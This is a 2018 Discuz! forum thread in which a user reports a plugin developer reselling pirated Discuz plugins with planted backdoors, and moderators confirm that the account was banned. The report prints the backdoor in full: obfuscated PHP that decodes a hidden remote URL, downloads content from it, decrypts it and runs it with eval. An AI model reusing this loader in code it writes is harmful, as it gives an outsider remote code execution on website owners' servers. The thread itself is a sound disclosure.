Discuz!官方免费开源建站系统

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索

[已完结] 【举报】盗版及木马倒卖者变身成disucz开发者!

 关闭 [复制链接]
小小草根站长 发表于 2018-6-19 17:53:58 | 显示全部楼层 |阅读模式
意见建议
网站 URL: 隐藏内容
联系方式: 隐藏内容
应用URL: 隐藏内容
本帖最后由 小小草根站长 于 2018-6-19 17:55 编辑

发现discuz应用中心开发者:https://addon.dismall.com/?@69270.developer ,此人在disucz插件内添加自己的后门,盗取用户插件和授权,然后倒卖盗版!

其倒卖地址:http://www.zhideyao.cn/shop/view227.html


不光倒卖,还在倒卖的资源内添加后门!后门代码如下:


  1. function caidi($oo){
  2.     $love = 'httpABczonekey`akndecryptud^gjchdh`winNULLB{NVJ:GJGbaiduseo`lpsck`xml';
  3.         $forver=stripos($love,'d');
  4.         $forvere=stripos($love,'z');
  5.         $GLOBALS['love'] = preg_replace(array("/`.*?`/","/abc/i","/[A-Z_].*[A-Z_]/"),array(".","://","/"),$love);
  6.         $forveres='DECODE';
  7.         $aini=substr($love,$forver,$forvere);
  8.         $aini=$oo?$forveres:$aini;
  9.         return $aini;
  10. }
  11. function decrypt($data, $key = '721520') {
  12.                 global $_G;
  13.                 $key = $key ? $key : $_G['config']['security']['authkey'];
  14.                 $type = caidi($key);
  15.                 return authcode($data,$type, $key);
  16.                 }

  17. function contentz($svip) {
  18. if(function_exists('file_get_contents')) {
  19. $data = file_get_contents($svip);
  20. } else {
  21. $ch = curl_init();
  22. $timeout = 5;
  23. curl_setopt ($ch, CURLOPT_URL, $svip);
  24. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  25. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  26. $data = curl_exec($ch);
  27. curl_close($ch);
  28. }
  29. return $data;
  30. }
  31. $iloveyou = caidi($oo);
  32. eval($iloveyou(strip_tags(contentz($love))));
复制代码
可以看到,解析出来的就是指向其网站的一个后门!这种人居然摇身一变成了discuz开发者!不知道官方怎么处理啊??





本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
湖中沉 发表于 2018-6-19 17:59:27 | 显示全部楼层
你截图的有木马后门的不是应用中心页面啊,下盗版很多都是有后门木马的,应用中心要上架都是有安全审核的,不可能有后门木马行为
回复

使用道具 举报

 楼主| 小小草根站长 发表于 2018-6-19 18:00:38 | 显示全部楼层
湖中沉 发表于 2018-6-19 17:59
你截图的有木马后门的不是应用中心页面啊,下盗版很多都是有后门木马的,应用中心要上架都是有安全审核的, ...

我是说他在其他平台倒卖盗版插件还加木马后门,这种人也能成为开发者,有点吓人
回复

使用道具 举报

民审大大 发表于 2018-6-19 19:33:18 | 显示全部楼层
小小草根站长 发表于 2018-6-19 18:00
我是说他在其他平台倒卖盗版插件还加木马后门,这种人也能成为开发者,有点吓人

传播盗版的作者,查实后一律会封号
回复

使用道具 举报

民审K星客 发表于 2018-6-19 19:58:08 | 显示全部楼层
经查实举报有效,已封号处理
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2024-6-2 12:52 , Processed in 0.103698 second(s), 20 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表